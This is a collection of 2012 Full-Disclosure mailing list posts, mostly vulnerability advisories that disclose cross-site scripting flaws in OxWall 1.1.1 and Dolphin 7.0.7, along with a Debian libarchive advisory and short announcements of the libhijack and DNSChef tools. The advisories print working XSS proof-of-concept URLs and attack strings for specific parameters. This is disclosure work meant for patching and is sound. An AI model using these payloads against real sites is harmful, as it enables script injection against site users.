[Full-disclosure] Addition to CVE-2012-0872 oxwall
Our addition to yesterday YGn advisory:
# CVE-2012-0872
{ Ariko-Security - Advisory #2/2/2012 } =
OxWall Cross-site scripting (XSS)
Vendor's description of software and download:
# Oxwall Foundation http://www.oxwall.org/
Dork:
# N/a
Application Info:
#OxWall 1.1.1
Vulnerability Info:
# Type: XSS
Time Table:
# 13/02/2012 - Vendor notified
XSS:
#Input passed to the "plugin" parameter in index.php is not properly sanitised
before being returned to the user.
Solution:
# Input validation of vulnerable parameters should be corrected.
POC:
http://site/ow_updates/?plugin=%27%22%28%29%26%251%3CScRiPt%20%3Eprompt%28982087%29%3C%2fScRiPt%3E
advisory:
http://advisories.ariko-security.com/2012/audyt_bezpieczenstwa_2m2.html
Credit:
# Discoverd By: Ariko-Security 2012
Ariko-Security
Rynek Glowny 12
32-600 Oswiecim
tel:. +48 33 4741511 mobile: +48 784086818
(Mo-Fr 10.00-20.00 CET)
Ariko-Security Sp. z o.o. z siedzibą w Oświęcimiu , zarejestrowana przez Sąd
Rejonowy dla m. Krakowa-Śródmieścia, XII Wydział Gospodarczy Krajowego Rejestru
Sądowego, KRS: 0358273, NIP: 549-239-90-67, REGON 121262172
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [oss-security] Dolphin 7.0.7 <= Multiple Cross Site Scripting Vulnerabilities
On 02/20/2012 10:05 AM, YGN Ethical Hacker Group wrote: > 1. OVERVIEW > > Dolphin 7.0.7 and lower versions are vulnerable to Cross Site Scripting. > > > 2. BACKGROUND > > Dolphin is the only "all-in-one" free community software platform for > creating your own social networking, community or online dating site > without any limits and under your full control. Dolphin comes with > hundreds of features, module plugins and tools. Everything is included > and extension posibilities are literally endless. You can use it for > free with a BoonEx link in the footer or buy a $99 permanent license > to remove that requirement. > > > 3. VULNERABILITY DESCRIPTION > > Multiple parameters (explain,photos_only,online_only,mode) were not > properly sanitized, which allows attacker to conduct Cross Site > Scripting attack. This may allow an attacker to create a specially > crafted URL that would execute arbitrary script code in a victim's > browser. > > > 4. VERSIONS AFFECTED > > 7.0.7 and lower > > > 5. PROOF-OF-CONCEPT/EXPLOIT > > Vulnerable Parameter: explain > > http://localhost/dolph/explanation.php?explain=%27%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E > > > Vulnerable Parameters: photos_only,online_only,mode > > http://localhost/dolph/viewFriends.php?iUser=1&page=1&per_page=32&sort=activity&photos_only='">alert(/xss/) > > http://localhost/dolph/viewFriends.php?iUser=1&page=1&per_page=32&sort=activity&online_only='">alert(/xss/) > > http://localhost/dolph/viewFriends.php?iUser=1&page=1&sort=activity&mode='">alert(/xss/) > > > 6. SOLUTION > > Upgade to the latest version of Dolphine. > > > 7. VENDOR > > BoonEx Pty Ltd > http://www.boonex.com/ > > > 8. CREDIT > > Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. > > > 9. DISCLOSURE TIME-LINE > > 2011-06-09: notified vendor > 2011-10-24: fixed version, 7.0.8, released > 2012-02-20: vulnerability disclosed > > > 10. REFERENCES > > Original Advisory URL: > http://yehg.net/lab/pr0js/advisories/%5BDolphin_7.0.7%5D_xss > BoonEx Home Page: http://www.boonex.com/ > > > #yehg [2012-02-20] Please use CVE-2012-0873 for these XSS issues. -- Kurt Seifried Red Hat Security Response Team (SRT) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [oss-security] OxWall 1.1.1 <= Multiple Cross Site Scripting Vulnerabilities
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
On 02/20/2012 09:53 AM, YGN Ethical Hacker Group wrote:
> 1. OVERVIEW
>
> OxWall 1.1.1 and lower versions are vulnerable to Cross Site Scripting.
>
>
> 2. BACKGROUND
>
> Oxwall is a free open source software package for building social
> networks, family sites and collaboration systems. It is a flexible
> community website engine developed with the aim to provide people with
> a well-coded, user-friendly software platform for social needs. It is
> easy to set up, configure and manage Oxwall while you focus on your
> site idea. We are testing the concept of free open source community
> software for complete (site,sub-site setups) and partial
> (widgets,features) community and collaboration solutions for companies
> and individuals.
>
>
> 3. VULNERABILITY DESCRIPTION
>
> Multiple parameters were not properly sanitized, which allows attacker
> to conduct Cross Site Scripting attack. This may allow an attacker to
> create a specially crafted URL that would execute arbitrary script
> code in a victim's browser.
>
>
> 4. VERSIONS AFFECTED
>
> 1.1.1 and lower
>
>
> 5. PROOF-OF-CONCEPT/EXPLOIT
>
> URL: http://localhost/Oxwall/join
>
> Injected Attack String: '">alert(/XSS/)
> Method: HTTP POST
> Vulnerable Parameters: captchaField, email, form_name ,password
> ,realname ,repeatPassword ,username
>
>
>
> URL: http://localhost/Oxwall/contact
>
> Injected Attack String: '">alert(/XSS/)
> Method: HTTP POST
> Vulnerable Parameters: captcha, email, form_name ,from , subject
>
>
> URL:
> http://localhost/Oxwall/blogs/browse-by-tag?tag=%27%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E
> Vulnerable Parameter: tag
>
>
>
> Vulnerable Parameter: RAW-URI
>
> http://localhost/Oxwall/photo/viewlist/tagged/> onerror=alert('XSS')>
>
> http://localhost/Oxwall/photo/viewlist/%22style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22onmouseover=alert%28%27XSS%27%29;%22x=
>
> http://localhost/Oxwall/video/viewlist/%22style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22onmouseover=alert%28%27XSS%27%29;%22x=
>
>
> 6. SOLUTION
>
> Upgade to the latest version of Oxwall.
>
>
> 7. VENDOR
>
> Oxwall Foundation
> http://www.oxwall.org/
>
>
> 8. CREDIT
>
> Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.
>
>
> 9. DISCLOSURE TIME-LINE
>
> 2011-06-09: notified vendor
> 2012-02-20: vulnerability disclosed
>
>
> 10. REFERENCES
>
> Original Advisory URL:
> http://yehg.net/lab/pr0js/advisories/%5BOxWall_1.1.1%5D_xss
> Oxwall Home Page: http://www.oxwall.org/
>
>
> #yehg [2012-02-20]
Please use CVE-2012-0872 for these XSS issues.
- --
Kurt Seifried Red Hat Security Response Team (SRT)
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.12 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
iQIcBAEBAgAGBQJPQtHCAAoJEBYNRVNeJnmTiKoP/A9I5fFvOOi9SFbkHWQPTWu/
ID9i4VEPeH+YyGITSjx2J0nC4IaSr30DMemc4XjQqpRUz15KjmQYXapS+hDJXa7f
9XpzUERrQPaghyIJG1X81pj2ONmS9euT31SNtH7iMt+4QD6K7ZOkOFFMSD0ViJS4
+4CrCIyQ26wrmcaZ164JT6WeJNFzmZk1Fp6QMoyclMvQh0pzaN2I7fVb8lUQXI7C
V9T3BIfpPVqoVrX69Ki5ojULLJL/EJhXKaAewUwfHsrX/KikFLq530/6x7+wjGXN
+/GauH/IO4BB7XytY57sbILcfDwWKJycLbg8D+M/9QO+cp047HQD8AFHDAkTLjCL
N2+9ckRyr3z4a5Ou9/Vfa6Fpg50RJ752ErDMOF2GQ4enkf7+LZuHmHmsVKEVUJWI
TfxpaTyYLiUTnVPcazz8mqEXSuFw8gkdBGvjQpD3vTlVCNjfPZY3naqC2aWGOu2b
VHnIbF/TDoi3oV/7Tu68pFcKeoopVEs3ENmdJagM4qINgs7xw3XtDJuICS1a8A70
DJIsbHeASbbvtpEk0X69WzbC6QJuufhHImEAohfrhww8tZ+lqFkE0esaRBEGNGe2
Hl4sXVCL9UgiGbXYO+VNohpnGAf+eWRL/fhLoBnU906sUkllXTDAfqBv6Ehey8u8
dGs82XRcilij2gX4LabZ
=Sh3G
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Dolphin 7.0.7 <= Multiple Cross Site Scripting Vulnerabilities
1. OVERVIEW Dolphin 7.0.7 and lower versions are vulnerable to Cross Site Scripting. 2. BACKGROUND Dolphin is the only "all-in-one" free community software platform for creating your own social networking, community or online dating site without any limits and under your full control. Dolphin comes with hundreds of features, module plugins and tools. Everything is included and extension posibilities are literally endless. You can use it for free with a BoonEx link in the footer or buy a $99 permanent license to remove that requirement. 3. VULNERABILITY DESCRIPTION Multiple parameters (explain,photos_only,online_only,mode) were not properly sanitized, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser. 4. VERSIONS AFFECTED 7.0.7 and lower 5. PROOF-OF-CONCEPT/EXPLOIT Vulnerable Parameter: explain http://localhost/dolph/explanation.php?explain=%27%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E Vulnerable Parameters: photos_only,online_only,mode http://localhost/dolph/viewFriends.php?iUser=1&page=1&per_page=32&sort=activity&photos_only='">alert(/xss/) http://localhost/dolph/viewFriends.php?iUser=1&page=1&per_page=32&sort=activity&online_only='">alert(/xss/) http://localhost/dolph/viewFriends.php?iUser=1&page=1&sort=activity&mode='">alert(/xss/) 6. SOLUTION Upgade to the latest version of Dolphine. 7. VENDOR BoonEx Pty Ltd http://www.boonex.com/ 8. CREDIT Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2011-06-09: notified vendor 2011-10-24: fixed version, 7.0.8, released 2012-02-20: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5BDolphin_7.0.7%5D_xss BoonEx Home Page: http://www.boonex.com/ #yehg [2012-02-20] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] OxWall 1.1.1 <= Multiple Cross Site Scripting Vulnerabilities
1. OVERVIEW OxWall 1.1.1 and lower versions are vulnerable to Cross Site Scripting. 2. BACKGROUND Oxwall is a free open source software package for building social networks, family sites and collaboration systems. It is a flexible community website engine developed with the aim to provide people with a well-coded, user-friendly software platform for social needs. It is easy to set up, configure and manage Oxwall while you focus on your site idea. We are testing the concept of free open source community software for complete (site,sub-site setups) and partial (widgets,features) community and collaboration solutions for companies and individuals. 3. VULNERABILITY DESCRIPTION Multiple parameters were not properly sanitized, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser. 4. VERSIONS AFFECTED 1.1.1 and lower 5. PROOF-OF-CONCEPT/EXPLOIT URL: http://localhost/Oxwall/join Injected Attack String: '">alert(/XSS/) Method: HTTP POST Vulnerable Parameters: captchaField, email, form_name ,password ,realname ,repeatPassword ,username URL: http://localhost/Oxwall/contact Injected Attack String: '">alert(/XSS/) Method: HTTP POST Vulnerable Parameters: captcha, email, form_name ,from , subject URL: http://localhost/Oxwall/blogs/browse-by-tag?tag=%27%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E Vulnerable Parameter: tag Vulnerable Parameter: RAW-URI http://localhost/Oxwall/photo/viewlist/tagged/> http://localhost/Oxwall/photo/viewlist/%22style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22onmouseover=alert%28%27XSS%27%29;%22x= http://localhost/Oxwall/video/viewlist/%22style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22onmouseover=alert%28%27XSS%27%29;%22x= 6. SOLUTION Upgade to the latest version of Oxwall. 7. VENDOR Oxwall Foundation http://www.oxwall.org/ 8. CREDIT Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2011-06-09: notified vendor 2012-02-20: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5BOxWall_1.1.1%5D_xss Oxwall Home Page: http://www.oxwall.org/ #yehg [2012-02-20] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Tool] Libhijack 0.6 Released
I'm proud to announce the release of libhijack 0.6 today. Libhijack is a shared object that makes runtime process infection on 32/64bit Linux and 64bit FreeBSD easy. You can read the full release announcement here: http://0xfeedface.org/blog/lattera/2012-02-20/libhijack-06-released Thanks, Shawn "lattera" Webb ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] DNSChef - a highly configurable DNS proxy
Hello fulldisclosure, I wanted to share a new tool to help with application traffic analysis and interception. DNSChef is a cross-platform DNS proxy capable of forging responses based on inclusive and exclusive domain lists, matching domains with wildcards, proxying true responses for nonmatching domains, using external configuration files and other features useful for pentesters and malware analysts. DNSChef was developed to help with a test of an application which did not support HTTP proxy parameters. There are many ways to intercept network traffic; however, you may find this tool handy when everything else fails. DNSChef source and documentation: http://thesprawl.org/projects/dnschef/ -Peter ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 2413-1] libarchive security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2413-1 secur...@debian.org http://www.debian.org/security/ Luk Claes February 20, 2012 http://www.debian.org/security/faq - - Package: libarchive Vulnerability : buffer overflows Problem type : remote/local Debian-specific: no CVE ID : CVE-2011-1777 CVE-2011-1778 Two buffer overflows have been discovered in libarchive, a library providing a flexible interface for reading and writing archives in various formats. The possible buffer overflows while reading is9660 or tar streams allow remote attackers to execute arbitrary code depending on the application that makes use of this functionality. For the stable distribution (squeeze), this problem has been fixed in version 2.8.4-1+squeeze1. For the testing (wheezy) and unstable (sid) distributions, this problem has been fixed in version 2.8.5-5. We recommend that you upgrade your libarchive packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iEYEARECAAYFAk9CsnIACgkQHYflSXNkfP/wVACgogXQorcMosdliVws+7N5SlQT 53oAn3NShFAVTAPNS591WrJYz93WHpXs =ND6a -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fwd: [Webappsec] Call for Assistance: OWASP Virtual Patching Survey
On 21/02/2012 02:04, Jeffrey Walton wrote: > It is only 10 questions and by taking the survey, you could also win a > free spot in the upcoming OWASP AppSecDC Virtual Patching Workshop. AT least they do not insist on an email address. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
